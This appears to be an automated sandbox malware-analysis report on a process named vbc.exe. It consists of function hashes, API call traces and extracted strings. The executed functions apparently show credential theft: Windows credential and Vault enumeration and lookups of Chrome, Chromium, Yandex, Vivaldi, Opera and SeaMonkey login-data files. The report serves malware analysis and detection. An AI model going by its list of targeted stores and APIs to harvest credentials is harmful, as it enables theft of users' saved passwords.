Instruction ID: 8e954c441d2a7d2be3c6a4719c61f161b74afa1c2bf20d34ff46e75808351d71
Opcode Fuzzy Hash: 4ed0cbe7b8de94a05175e6d163ebbc7da450303b8826bb1ea281e3a7a13bb4e4
Instruction Fuzzy Hash: 0F315E7540E7C09FD7138B2588A1792BFB4EF53614F0A44DBD8898F5A3D229580ACB72

Uniqueness

Uniqueness Score: -1.00%

Function 00DE08E0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a133cdb108518fa422aa313e99a2712993051f3c58b04b04534a13eacaf1f5a
Instruction ID: 1d03477a73e27077abab63f5cd77d703b18f747e3f1891e56ad70737f0f7e5e7
Opcode Fuzzy Hash: 6a133cdb108518fa422aa313e99a2712993051f3c58b04b04534a13eacaf1f5a
Instruction Fuzzy Hash: 732148764097C09FE7138B258C51B62BFB4EF43614F0E84DBE9898F553C2695848CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0774, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65c85e6afbcd92ce7c524b3d95f843ad829425ad98b901e230cd57aa93053d4
Instruction ID: 6416d20d2fc4503f0f607eb5c6698d90a15dfff73cae0cdb980e34276e43cc48
Opcode Fuzzy Hash: c65c85e6afbcd92ce7c524b3d95f843ad829425ad98b901e230cd57aa93053d4
Instruction Fuzzy Hash: 10215E714097C49FD7139B259C94B66BFB4EF43610F0988DBE8898B553C2695848CB72

Uniqueness

Uniqueness Score: -1.00%

Function 07BE1F4C, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.609741236.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 143a70fbe97ac8d722c30087ac365af421bf6ccad34623c7a4971db7b1f52572
Instruction ID: 5550dcfb2097bdd89d74d608f034e8a880bf43dfba85a2dbf0ae79514854a7da
Opcode Fuzzy Hash: 143a70fbe97ac8d722c30087ac365af421bf6ccad34623c7a4971db7b1f52572
Instruction Fuzzy Hash: BB11BAB5608341AFD350CF19D880A5BFBE4FB88664F04896EF99CD7311D275EA048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0B8C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fcc83402551c1e2c6d47d8287f607b1fc82bb147460f36680c3c03c35a15ef
Instruction ID: 3947619dc9d29cc3932bc5ebca27ee219a4853d7ce40beb0fc631a397ea22d14
Opcode Fuzzy Hash: 02fcc83402551c1e2c6d47d8287f607b1fc82bb147460f36680c3c03c35a15ef
Instruction Fuzzy Hash: 6D11D634244784DFD715DB15C984B26BFE1AB88708F38C69DE9891B643C7BBD883CA61

Uniqueness

Uniqueness Score: -1.00%

Function 07BE1DF0, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.609741236.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a688470479f0b09e4ce6e4ec0f23864e088f4cdb46181fbc76adc9a2bd4a34
Instruction ID: c2b9c224406e98818c51ddad945cdd75c7f0107f9dc1127ed951b3a936517108
Opcode Fuzzy Hash: e1a688470479f0b09e4ce6e4ec0f23864e088f4cdb46181fbc76adc9a2bd4a34
Instruction Fuzzy Hash: CF11FAB5608305AFD350CF09DC80E5BFBE8EB88660F04892EFD9997311D271E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 027FB0D4, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603690247.00000000027F7000.00000040.00000001.sdmp, Offset: 027F7000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d144a6952e38d36aed70eab7b8b7f1e215645549979ad23894893eacf4db510f
Instruction ID: 23bbdf7d588e58afda8653668af533aa504ace813011761c805d8a016135bcc6
Opcode Fuzzy Hash: d144a6952e38d36aed70eab7b8b7f1e215645549979ad23894893eacf4db510f
Instruction Fuzzy Hash: 1211FAB5608305AFD350CF49DC80E5BFBE8EB88660F04892EFD9897311D371E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0A1A, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bad8cbd91fbbdece7fdfb40b53a441ee2096a269543f842ef43d452319f308e
Instruction ID: 0716434cf8e1c505cc2480ab22091dd26f051f5623347c8155ec5f77caf4eb3e
Opcode Fuzzy Hash: 5bad8cbd91fbbdece7fdfb40b53a441ee2096a269543f842ef43d452319f308e
Instruction Fuzzy Hash: E40184765047849FE711CF06DC84B62FFD8EB85724F08846AED494B602C3B9A844CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE08D2, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d36fd8c41be79233b2921f0f9c60e0fd1c526f9f59fe0ad68d3c6e579dd4c6
Instruction ID: 208dad35777b69e713e2ff32e2e52cd81bb2650ef791183d8598902bb921e56e
Opcode Fuzzy Hash: 04d36fd8c41be79233b2921f0f9c60e0fd1c526f9f59fe0ad68d3c6e579dd4c6
Instruction Fuzzy Hash: 88018476504784AFE711DF06DD84B62FFD8EB85724F08846AED494B602C3B9A844CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE09EA, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466f48cfa6c6f77463c1ca7ad3f0600de61abdb4df09f656d280ab1c336d9f61
Instruction ID: 013485b57b7ed60b656317efe7f0d42a7c5fc2da36a223aee7540ed6ac3c5e5c
Opcode Fuzzy Hash: 466f48cfa6c6f77463c1ca7ad3f0600de61abdb4df09f656d280ab1c336d9f61
Instruction Fuzzy Hash: E60161765047849FE711CE06DC84B62FF98EB85724F08846AED494B602C3B9A844CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0B6B, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a47eb240b4f1b1192f1a3a7a02d439e463fb340aa02393c33b343276e2ac1b
Instruction ID: 1792a6a97dfaa89bd7f57701ea1a3b4e65bffa20a3157f9613fc57087c14179b
Opcode Fuzzy Hash: 08a47eb240b4f1b1192f1a3a7a02d439e463fb340aa02393c33b343276e2ac1b
Instruction Fuzzy Hash: EC115E351093C49FC706CB20C990B55BFB1AF46718F2986DED8899B6A3C37A9846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DE081E, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c6a70063dcd9ac3791e7294208d60dd343d7efda75331d975a4eba6d4e4f077
Instruction ID: fd8ff6ada8b5d1f2158a4be82a22dd5c126a4d6b8400c391ba857ca8e0e8e5e8
Opcode Fuzzy Hash: 7c6a70063dcd9ac3791e7294208d60dd343d7efda75331d975a4eba6d4e4f077
Instruction Fuzzy Hash: 2C019E31504AC4DFD710AF1AD9C4726FFD4EB44720F18886AED4E4B602C7B99844CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0936, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3858aa598a81e2136cc5b407f85552c245223211fde9e1e3b5e2d952fd049a77
Instruction ID: ea9bfb792956bbd5d7c312688a745fd6548bbc0d3ca2931076bb272458758def
Opcode Fuzzy Hash: 3858aa598a81e2136cc5b407f85552c245223211fde9e1e3b5e2d952fd049a77
Instruction Fuzzy Hash: AE019E715047C49FE7119F16DD84726FF94EB44720F1C846ADD8A4B607C7B99884CEB2

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0C48, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction ID: 88785869c783f6bdfda7e18647d19e116e17c2964567077d4286c6d91010c6a9
Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
Instruction Fuzzy Hash: 2BF03135148684DFC306DF00D940B15FBA2FB89718F24C6ADE9890B752C377D853DA91

Uniqueness

Uniqueness Score: -1.00%

Function 00DE05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603247497.0000000000DE0000.00000040.00000040.sdmp, Offset: 00DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de74616c122464ce480e0c284b9caa9553b662ce68f2228ccf66cff20e4f1e4
Instruction ID: 12827cdf6d119518c759f1de504246ab05e1429f1a335a027d9dbd35210ee745
Opcode Fuzzy Hash: 2de74616c122464ce480e0c284b9caa9553b662ce68f2228ccf66cff20e4f1e4
Instruction Fuzzy Hash: 0FE092766406048BD650CF0BEC41452F794EB84630B08C47FDD0D8B700E13AB504CEA5

Uniqueness

Uniqueness Score: -1.00%

Function 07BE1E3F, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.609741236.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd553bd6b0170f8ae11ed1f1525dba36807c5ee4a37e79a7446a05fbbc023f29
Instruction ID: 01732a42d31cf4d69c5e72cfd8f044c62078df63917f7a3c8bd63411c96c3ae6
Opcode Fuzzy Hash: fd553bd6b0170f8ae11ed1f1525dba36807c5ee4a37e79a7446a05fbbc023f29
Instruction Fuzzy Hash: 79E048725417046BD6509E06AC85B63FB58EB40A30F14C557EE0D5B702D176B51489F5

Uniqueness

Uniqueness Score: -1.00%

Function 07BE1FB7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.609741236.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822477fe9d97cc499a7469943f189af44c4f62164300bde73dc5c11c740afe74
Instruction ID: a0968f91f97df2014d506f5ea98d840d3089ffe07daeec6eae0f4d8f7cc5a8bd
Opcode Fuzzy Hash: 822477fe9d97cc499a7469943f189af44c4f62164300bde73dc5c11c740afe74
Instruction Fuzzy Hash: D6E0D8B25413046BD2108E06AC41B63FB58EB40A30F04C567EE0C5B301D176B51489E5

Uniqueness

Uniqueness Score: -1.00%

Function 07BE1863, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.609741236.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86602a2ecefb8652613042e4355eb57edf73beaf6ae2c42496a70ca278b75374
Instruction ID: 00f443e0aa53d730b8a6787fce4b571af9d5789fa729ccd73fb750769d9ffba0
Opcode Fuzzy Hash: 86602a2ecefb8652613042e4355eb57edf73beaf6ae2c42496a70ca278b75374
Instruction Fuzzy Hash: 2FE0D8725413046BD2108E06EC41B63FB58EB40A30F14C457EE0C5B301D176B614C9E5

Uniqueness

Uniqueness Score: -1.00%

Function 027FB123, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603690247.00000000027F7000.00000040.00000001.sdmp, Offset: 027F7000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9e2e5667f83ba1c025a0d102bf0533d33575e4cc06c25abcec202841bb42f3
Instruction ID: 2be4b5dac898d2e544ef660fb38e711c3dbf723628eb42e5a87ccebfc9358f2e
Opcode Fuzzy Hash: ca9e2e5667f83ba1c025a0d102bf0533d33575e4cc06c25abcec202841bb42f3
Instruction Fuzzy Hash: E8E0D8765413046BD2108E069C41B53FB58EB50A30F04C557EE0C5B301D176B50489F5

Uniqueness

Uniqueness Score: -1.00%

Function 027E23F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603613134.00000000027E2000.00000040.00000001.sdmp, Offset: 027E2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1fda0fad6f7ff4bad7c724cadb39e3b75b792dc52555f2e6e637b4d0e28f7b4
Instruction ID: 6c7039868285f39532610022e35e86858122d9a97aebfc506ae0e3922ebc981b
Opcode Fuzzy Hash: b1fda0fad6f7ff4bad7c724cadb39e3b75b792dc52555f2e6e637b4d0e28f7b4
Instruction Fuzzy Hash: B1D05E79304A818FD7268B1CC1A4F953BD8AF56B08F5644FDEC008B6A3C368DD81D210

Uniqueness

Uniqueness Score: -1.00%

Function 027E23BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.603613134.00000000027E2000.00000040.00000001.sdmp, Offset: 027E2000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f9b29f066112e6b8b710cae84ec4543ba4f014b9a03775a888e764742982c4
Instruction ID: 9e775803ccf4ec0931251c9a4dba5c16a47092cda72fdcced41fea4c57fc59d0
Opcode Fuzzy Hash: 30f9b29f066112e6b8b710cae84ec4543ba4f014b9a03775a888e764742982c4
Instruction Fuzzy Hash: 7CD05E342002818BDB15DB0CC694F5937D8AB45B08F1644E8AC01CB663C3B4D881CA10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: vbc.exe PID: 6948 Parent PID: 6852 vbc.exeCOMMON

Executed Functions

Function 0040978A, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004097B2

Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

Part of subcall function 004118EA: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
Part of subcall function 004118EA: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992

NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
_wcsicmp.MSVCRT ref: 004098B7
_wcsicmp.MSVCRT ref: 004098CA
_wcsicmp.MSVCRT ref: 004098DD
OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 004098F1
GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00409937
DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00409946
memset.MSVCRT ref: 00409964
CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00409997
_wcsicmp.MSVCRT ref: 004099B7
CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 004099F7

Strings

taskhostex.exe, xrefs: 004098D5
taskhost.exe, xrefs: 004098C2
dllhost.exe, xrefs: 004098AE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
String ID: dllhost.exe$taskhost.exe$taskhostex.exe
API String ID: 594330280-3398334509
Opcode ID: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
Instruction ID: 2b0fa152ef01bef0fcdaafddb1ab82311fd8af30ec04a4c20003f9f52c8fe1fb
Opcode Fuzzy Hash: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
Instruction Fuzzy Hash: 7B815E71900219EFEF10EF95C885AAEBBB5FF44305F20806EF905B6292D7399E41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040938F, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00412880,*.*,?), ref: 004093A5
FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00412880,*.*,?), ref: 004093C3
wcslen.MSVCRT ref: 004093F3
wcslen.MSVCRT ref: 004093FB

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindwcslen$FirstNext
String ID:
API String ID: 2163959949-0
Opcode ID: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
Instruction ID: fe44496fd245f22b3294f1be8fcbf5b62ffed3b59158e7af3f9261faba672c79
Opcode Fuzzy Hash: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
Instruction Fuzzy Hash: CA11E97240A7019FD7149B64E884A9B73DCEF45324F204A3FF459E31C1EB78AC008718

Uniqueness

Uniqueness Score: -1.00%

Function 00411E4C, Relevance: 104.0, APIs: 43, Strings: 16, Instructions: 752COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411EC2
wcsrchr.MSVCRT ref: 00411EDB
memset.MSVCRT ref: 0041202F

Part of subcall function 0040A94C: _wcslwr.MSVCRT ref: 0040AA14
Part of subcall function 0040A94C: wcslen.MSVCRT ref: 0040AA29

Part of subcall function 0040956D: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
Part of subcall function 0040956D: wcslen.MSVCRT ref: 004095CC
Part of subcall function 0040956D: wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
Part of subcall function 0040956D: memset.MSVCRT ref: 00409679
Part of subcall function 0040956D: memcpy.MSVCRT ref: 0040969A

Part of subcall function 0040ADD0: LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
Part of subcall function 0040ADD0: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4

Part of subcall function 004444B7: memcmp.MSVCRT ref: 0044455D

Part of subcall function 00410F47: memset.MSVCRT ref: 00410F6A
Part of subcall function 00410F47: memset.MSVCRT ref: 00410F7F
Part of subcall function 00410F47: memset.MSVCRT ref: 00410F94
Part of subcall function 00410F47: memset.MSVCRT ref: 00410FA9
Part of subcall function 00410F47: memset.MSVCRT ref: 00410FBE
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FE4
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FF5
Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041102D
Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041103B
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411074
Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411082

memset.MSVCRT ref: 0041204B
memset.MSVCRT ref: 00412061
memset.MSVCRT ref: 0041207D
wcslen.MSVCRT ref: 004120C4
wcslen.MSVCRT ref: 004120D1
ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,?,00000104), ref: 004121C5
memset.MSVCRT ref: 0041217E

Part of subcall function 00407991: memset.MSVCRT ref: 004079D1
Part of subcall function 00407991: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
Part of subcall function 00407991: memset.MSVCRT ref: 00407A23
Part of subcall function 00407991: memset.MSVCRT ref: 00407A3B
Part of subcall function 00407991: memset.MSVCRT ref: 00407A53
Part of subcall function 00407991: memset.MSVCRT ref: 00407A6B
Part of subcall function 00407991: memset.MSVCRT ref: 00407A83
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A8E
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A9C
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407ACB

memset.MSVCRT ref: 00412241
memset.MSVCRT ref: 0041225B
wcslen.MSVCRT ref: 00412275
wcslen.MSVCRT ref: 00412283
memset.MSVCRT ref: 004122FD
memset.MSVCRT ref: 00412317
wcslen.MSVCRT ref: 00412331
wcslen.MSVCRT ref: 0041233F
memset.MSVCRT ref: 004123C2
memset.MSVCRT ref: 004123E0
memset.MSVCRT ref: 004123FE
memset.MSVCRT ref: 00412573

Part of subcall function 00407991: wcslen.MSVCRT ref: 00407AD9
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B08
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B16
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B45
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B53
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B82
Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B90
Part of subcall function 00407991: SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB

wcslen.MSVCRT ref: 0041245B
wcslen.MSVCRT ref: 00412469
wcslen.MSVCRT ref: 004124AF
wcslen.MSVCRT ref: 004124BD
wcslen.MSVCRT ref: 00412503
wcslen.MSVCRT ref: 00412511
_wcsicmp.MSVCRT ref: 004125DA

Part of subcall function 004442F9: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
Part of subcall function 004442F9: ??2@YAPAXI@Z.MSVCRT ref: 00444324
Part of subcall function 004442F9: memset.MSVCRT ref: 00444333
Part of subcall function 004442F9: ??3@YAXPAX@Z.MSVCRT ref: 00444356
Part of subcall function 004442F9: CloseHandle.KERNEL32(00000000), ref: 0044435D

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe, xrefs: 0041218B
Google\Chrome\User Data, xrefs: 00412462, 0041247E
*.*, xrefs: 004127C4
Data\Profile, xrefs: 004120BF, 004120E6
%programfiles%\Sea Monkey, xrefs: 004121C0
Yandex\YandexBrowser\User Data\Default\Login Data, xrefs: 0041227C, 0041229B
Opera\Opera7\profile\wand.dat, xrefs: 004126D9, 004126F5
Chromium\User Data, xrefs: 0041250A, 00412526
wand.dat, xrefs: 00412811, 00412830
Path, xrefs: 00412186
Login Data, xrefs: 004125D4
Google\Chrome SxS\User Data, xrefs: 004124B6, 004124D2
Opera Software\Opera Stable\Login Data, xrefs: 004128A2, 004128BE
Opera\Opera\wand.dat, xrefs: 0041266F, 0041268B
Opera, xrefs: 0041277A, 00412796
Vivaldi\User Data\Default\Login Data, xrefs: 00412338, 00412357

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$??2@??3@AddressByteCharCloseCredCurrentDirectoryEnumerateEnvironmentExpandFileHandleLibraryLoadMultiProcSizeStringsWide_wcsicmp_wcslwrmemcmpmemcpywcsncmpwcsrchr
String ID: %programfiles%\Sea Monkey$*.*$Chromium\User Data$Data\Profile$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$Vivaldi\User Data\Default\Login Data$Yandex\YandexBrowser\User Data\Default\Login Data$wand.dat
API String ID: 2195781745-1743926287
Opcode ID: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
Instruction ID: 7a0d4c8da9719b4bd57d9e34dd235b5097b77d6fd782259e08ea59ad0a0aa82b
Opcode Fuzzy Hash: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
Instruction Fuzzy Hash: 774293B2509344ABD720EBA5D985BDBB3ECBF84304F01092FF588D3191EBB8D545879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF55, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 00403C8C: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
Part of subcall function 00403C8C: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
Part of subcall function 00403C8C: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
Part of subcall function 00403C8C: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF81
GetModuleHandleW.KERNEL32(00000000,00414266,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF9A
EnumResourceTypesW.KERNEL32 ref: 0040FFA1

Strings

/deleteregkey, xrefs: 0041001B
/savelangfile, xrefs: 0040FFED
, xrefs: 0040FFB5

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
Instruction ID: 58268879d1a8d32d9d01966b45afca8998e7ac275f8ef3c48d75c103cdcc3135
Opcode Fuzzy Hash: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
Instruction Fuzzy Hash: A8518F71508745AFDB20AFA2DC49A9FB7A8FF45344F40083EF684E2152DB79D8848B5A

Uniqueness

Uniqueness Score: -1.00%

Function 004443B0, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D

Strings

VaultFree, xrefs: 004443EE
VaultGetInformation, xrefs: 004443FB
vaultcli.dll, xrefs: 004443B8
VaultCloseVault, xrefs: 004443D4
VaultEnumerateItems, xrefs: 004443E1
VaultOpenVault, xrefs: 004443C9
VaultGetItem, xrefs: 00444408, 0044440D, 00444416

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2238633743-2107673790
Opcode ID: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
Instruction ID: bae3ddfd5a2cf1e2657d78bbfe85c411ed61fca9aeaa9a4901361c1bc58423a9
